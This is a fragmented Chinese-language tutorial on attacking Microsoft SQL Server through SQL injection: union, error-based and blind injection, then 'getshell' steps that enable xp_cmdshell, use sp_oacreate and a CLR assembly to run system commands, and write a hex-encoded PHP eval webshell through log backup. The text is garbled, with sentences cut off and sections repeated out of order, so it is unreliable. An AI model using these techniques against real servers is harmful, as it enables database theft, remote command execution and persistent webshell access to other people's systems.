结构三、MSsql重点表1、master

四、Mssql常用函数五、Mssql的报错注入六、Mssql的盲注常用以下函数进行盲注

七、联合注入1、获取当前表的列数2、获取当前数据库名3、获取表名4、获取表id5、获取表字段名6、获取manage表中username字段的数据

八、注入流程1、判断权限2、获取当前数据库3、获取当前数据库内的所有数据表4、获取当前数据库内的指定数据表的所有字段5、取指定数据库内的表数据内容

九、getshell1、mssql权限2、SA权限开启xp_cmdshell

获取主机权限1判断xp_cmdshell

是否打开2然后通过上述的execute步骤将xp_cmdshell开启

3、SA权限使用sp_oacreate

Server实例的配置、权限、数据库定义和其他需要的信息。

2、model

模板数据库。

每当创建一个新的数据库包括系统数据库的TempDB会创建一个以

Model

数据库为副本数据库并更改成你创建数据库时所用的名。

3、msdb

SQL

暂时存储数据的用于存储系统运行过程中临时产生的数据例如用户定义的表、索引等。

三、MSsql重点表

所有数据库内都有此系统表无论是用户自建的数据库还是系统默认的数据库。

该表存放着当前数据库所有的表名类似MySQL中information_schema数据库中的tables表。

主要字段有name表名、id表

3、Syscolumns

所有数据库内都有此系统表无论是用户自建的数据库还是系统默认的数据库。

该表存放着当前数据库所有的字段名。

主要字段有name分别是字段名称、id表

sysobjects

name()返回当前数据库的名称host_name()返回计算机名称current_user返回当前数据库的用户名user数据库用户substring()字符串截取函数version查看数据库版本char()ASCII

转字符函数cast(text

结果报错显示在页面上object_id()根据表名返回数据库表名

IDobject_name()根据

返回数据库表名col_name(object_id,column_id)

举例Col_name(object_id(‘users’),2)返回指定表中指定字段(列的名称

由于Mssql是强类型数据库一旦数据类型不匹配就会报错。

这时我们就可以利用四则运算让整型数据和字符型数据之间来进行运算例如1user。

举例POCor

2、replace(string,substring1,substring2)

#将字符串中出现的某个子串替换成另一个字符串就是将在string中出现的substring1替换成substring2。

举例replace(‘1-a

举例replicate(‘abc’,3)返回结果是abcabcabc

4、stuff(string,pos,delete_length,insertstring)

举例stuff(‘xyz’,2,1,’abc’)返回结果是xabcz

#将字符串转换成大写或小写

#返回字符串中指定表达式的起始位置若查询到就返回位置若没有查询到就返回false。

另外charindex的参数不区分大小写。

七、联合注入

假如要获取下一个表可以使用老方法直接再where后面添加and

name

假如要获取下一个字段名可以使用老方法直接在where后面添加and

name

Quotename函数的主要作用就是在存储过程中给列名、表名等加个[

FOR

sa权限数据库操作文件管理命令执行注册表读取等system。

是mssql的最高权限db权限文件管理数据库操作等

users-administratorspublic权限数据库操作

guest-users

如果xp_cmdshell权限没有开启我们可以执行下面命令开启下面四步使xp——cmdshell开启

execute(sp_configure

可以执行系统权限之后,前提是获取的主机权限是administrators组里的

exec

HKLM\SYSTEM\CurrentControlSet\Control\Terminal

Server

虽然用第一步判断xp_cmdshell是否打开返回为1但是依然无法执行命令。

使用execute(‘xp_cmdshell

“whoami”’)

2然后通过上述的execute步骤将xp_cmdshell开启

3、SA权限使用sp_oacreate

server中的com组件sp_oacreate来执行系统命令。

declare

shell,run,null,whoami2开启sp_oacreate

EXEC

server语言固定最后一行是执行的系统命令4、SA权限使用CLR

执行系统命令

WarSQLKit.StoredProcedures.CmdExec;执行命令EXEC

例如exec

无论是LOG备份还是差异备份都是利用备份的过程中写入一句话木马

1sql

目标机器存在数据库备份文件。

也就是说如果我们利用test数据库那么要求test数据库存在数据库备份文件而且恢复模式得是完整模式知道网站的绝对路径支持堆叠注入

3注入代码

values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);

eval($_POST[x]);?

在表中插入一句话木马将日志文件备份到我们知道的路径最后删除创建的表